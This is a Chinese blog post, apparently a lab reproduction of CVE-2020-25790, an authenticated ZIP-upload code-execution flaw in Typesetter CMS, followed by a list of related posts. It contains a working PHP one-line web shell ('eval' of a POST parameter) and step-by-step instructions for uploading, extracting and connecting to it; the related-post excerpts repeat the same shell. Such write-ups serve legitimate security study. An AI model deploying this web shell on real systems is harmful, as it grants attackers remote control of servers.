typesetter 文件上传 (CVE-2020-25790)漏洞复现

已于 2024-04-03 09:49:54 修改
阅读量369 收藏 1
点赞数
文章标签: java servlet junit
于 2022-09-03 10:14:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/126674175
版权

1.漏洞描述

        Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 账号密码: admin admin

8db750ece18a4d0cb357150fefb1c0b9.png

fdefc3963be14ef8819f9670dcd3196a.png

2.内容-已上传的文档-上传

f6826adf012042dd924131c9f88218c0.png 3.选择一个zip压缩包上传

2ef021baf7f542b6b653fbc8ab41ff27.png

<?php @eval($_POST['cmd']);?>

 4.选择上传的压缩包,选择解压缩6632e0f293ea422b9fe7f388d6f29358.png

 5.压缩包解压后,右键选择解压出的1.php,右键选择打开,记录下上传地址后直接蚁剑登录。

 

5a590085fbbf41a2bbd4270132c4a758.png

 

 f13857036c604d28a84308ed46c6b9a6.png

 

 

weixin_42675091
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-25790typesetter 文件上传
beirry的博客
11-24 1263
vulfocus-typesetter 文件上传CVE-2020-25790) 从web端进入CMS,点击已上传的档案页面 准备test.php文件,文件内容如下 <?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码 将test.php上传到该页面,出现报错,报错内容是permission denied. 将test.php压缩成zip文件,再次上传 上传成功,解压test.zip文件 test.php文件解压成功 获取t
漏洞复现-TypesetterCms-文件上传ZIP】vulfocus/typesetter-cve_2020_25790
10-10 1001
【压缩后门文件上传
Typesetter CMS 文件上传漏洞复现(CVE-2020-25790)
锋刃科技的博客
12-19 1809
0X00简介 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 0X01影响范围 Typesetter CMS 5.x全版本,目前GitHub项目中还未修复此漏洞 0X02漏洞复现 虽然对上传的文件进行了过滤,但是没有对解压文件的文件进行过滤,导致可以上传,php的压缩文件,解压后就可以执行php文件。 Finder.class.php文件中extract函数解压后未对,解压后的文件名进行任何过滤 登录管理员账号
typesetter 文件上传CVE-2020-25790
小小猪的博客
12-30 782
typesetter 文件上传CVE-2020-25790漏洞简介: Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 环境搭建: 在线环境 地址 漏洞复现: 访问首页 点击logged in 进入登录界面 账号密码: admin admin 创建一句话文件,压缩成压缩包 <?php @eval($...
Typesetter CMS文件上传(CVE-2020-25790)
最新发布
m0_65150886的博客
02-21 312
Typesetter是一款轻量级的CMS,它以其无需数据库的特性和易用的内容编辑功能著称。虽然Typesetter的插件和主题数量不及WordPress,但对于追求简洁和速度的小型网站来说,它是一个不错的选择。Typesetter的用户界面直观,使得内容管理变得非常简单。在Typesetter CMS Typesetter CMS 5.*,<=5.1的版本中,存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。7.点击打开提取的php文件,获取文件路径。
vulfocus:typesetter 文件上传
qq_43332837的博客
08-24 215
管理员账号密码登入 点击已上传的档案 上传木马文件(zip文件) 解压 点击2.php得到路径 蚁剑连接得到flag
CKEditor-Glyphicons:将CKEditor Glyphicons插件添加到Typesetter CMS
02-04
将(版本2.2)添加到Typesetter的CKEditor(当前版本4.5)中。 另请参见, 安装后,一个新图标将出现在CKEditor的工具栏中,该图标将调用插件对话框,并允许将“ Glypicon Halflings”图标添加到可编辑的文本内容...
lombok-plugin-0.34-2020.1.zip
03-12
`lombok-plugin-0.34-2020.1.zip` 是 Lombok 插件的一个版本包,发布于2020年1月,版本号为0.34。这个压缩包包含了安装或更新 Lombok 插件所需的所有文件。在下载并解压后,你需要按照 IDE 的具体说明来安装这个插件...
TouchSwipeLoader:一个用于Typesetter CMS的简单jQuery TouchSwipe加载程序插件
04-28
用于Typesetter CMS的TouchSwipe Loader插件 只需加载要在JavaScript中使用的(当前为1.6版)即可。 就这样。 也可以看看 当前版本 1.6 要求 排字机CMS 手动安装 下载 将提取的文件夹“ TouchSwipeLoader-master”...
Typesetter(Typesetter CMS)内容管理系统 v5.1
11-29
Typesetter CMS重视网站的安全,提供了定期更新和补丁以修复潜在的安全漏洞。同时,系统提供了日志记录功能,便于管理员追踪和解决任何可能的问题。 九、API接口 对于开发者来说,Typesetter CMS提供了API接口,...
Typesetter CMS v5.1.zip
07-06
Typesetter CMS简介 TypesetterCMS是一个功能全面的网站内容管理系统,其嵌入式的管理接口可以让用户在一个简单的浏览器窗口中看到网站的改变。 Typesetter CMS特色功能: 真正的所见即所得编辑器 (CKEditor) 图库浏览 (ColorBox) SEO 友好的链接 文件上传管理器 可编辑的风格内容 删除文件到回收站 多用户管理 文本存储 快速页面加载 快速简易安装 HTML Tidy (可选) 方便的数据备份导出功能 Typesetter CMS页面展示 相关阅读 同类推荐:CMS
Label Typesetter-开源
07-17
"Label Typesetter"项目正是这样一个致力于优化邮寄标签打印的开源解决方案,它旨在以最小的代码体积实现高效、精确的条码和文字排版,从而减少对大型硬件设备的依赖。 "Label Typesetter"项目的核心理念是简洁与...
CVE-2018-9207 jQuery文件上传漏洞复现
LM01的博客
06-04 1502
CVE-2018-9207 jQuery文件上传漏洞复现
CVE-2022-29464 WSO2 任意文件上传漏洞复现
热爱学习,喜欢折腾!
09-24 1534
WSO2 是一个领先的开源 SOA 解决方案,包含了 SOA 相关的各种基础设施、技术框架和相关工具、流程 server、appserver 等。近日,WSO2 官网发布关于 WSO2 API Manager 中存在任意文件上传和远程代码执行漏洞的信息。该漏洞是由于 WSO2 存在路由对输入的内容过滤不严格,攻击者可以利用该漏洞在未授权的情况下,构造恶意数据执行文件上传攻击,最终获取服务器最高权限。
weblogic任意文件上传漏洞复现CVE-2018-2894)
wcwdnmdnmd的博客
12-02 816
启动weblogic任意文件上传漏洞环境。(这里使用了另一个漏洞环境的启动截图(^_^))。本次漏洞为了更真实的模拟实际环境,使用vulhub在vps上搭建。指定工作目录的目的是为了写文件,所以需要指定可写目录为工作目录。可以看到上传的内容,为javascript语句。不可写目录虽然显示上传成功,但访问返回404。还有其他上传方法,就不一一列举了,直接看结果。这里使用有回显带密码验证的webshell。使用Upsploit工具进行上传测试。上传成功,访问上传文件,成功弹窗。在安全界面上传webshell。
HorizontCMS文件上传漏洞复现(CVE-2020-28693)
锋刃科技的博客
12-18 803
简介 HorizontCMS是个人开发者的一个客户关系管理 Web 平台。 洞概述 该漏洞源于不受限制的文件上传,攻击者可利用该漏洞通过上传一个主题来通过zip文件上传PHP代码,并通过HTTP GET请求对主题< PHP文件名>执行PHP文件。 影响版本 HorizontCMS 1.0.0-beta 存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/ttimot24/HorizontCMS/tree/bootstrap-v4 安装教程可以参考官方教程
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 2013
apache 文件上传 (CVE-2017-15715)漏洞复现
CVE-2020-7143漏洞复现
一个安全研究员
12-27 2202
复现一波
Gila CMS 文件上传漏洞(CVE-2020-28692)
锋刃科技的博客
12-18 1142
简介 Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS) 洞概述 攻击者可利用该漏洞可以上传shell到tmp directy,并通过logs函数滥用.htaccess来执行PHP文件。 影响版本 Gila CMS 1.16.0版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/GilaCMS/gila/archive/1.16.0.zip 访问后台页面成功即为安装完成 漏洞复现 登录用户 漏洞url /ad.
lombok-plugin-0.31-2020.1
01-26
lombok-plugin-0.31-2020.1是一款针对Java开发的插件,它可以在IDEA等集成开发环境中使用。lombok是一款流行的Java库,它可以通过简化代码来提高开发效率。lombok-plugin-0.31-2020.1则是为了更好地集成lombok库而开发的插件,它可以实现自动插入lombok注解,帮助开发者快速地生成getter、setter和构造函数等常用方法,从而减少冗长的代码编写过程。 此外,lombok-plugin-0.31-2020.1还支持自动代码清理和格式化功能,可以帮助开发者保持代码风格的一致性,提高代码质量。它还提供了一些便捷的快捷键和工具,使得开发过程更加高效便捷。 对于Java开发者而言,lombok-plugin-0.31-2020.1可以大大简化他们的开发过程,减少样板式代码的书写,提高代码的可读性和可维护性。它的功能和易用性使得它成为了广大Java开发者的首选插件之一。 总之,lombok-plugin-0.31-2020.1是一款功能强大、易用的Java开发插件,它通过简化代码和提高开发效率,为开发者带来了极大的便利。希望开发者能够善用这一工具,提高自己的开发效率,更快地构建出高质量的Java应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值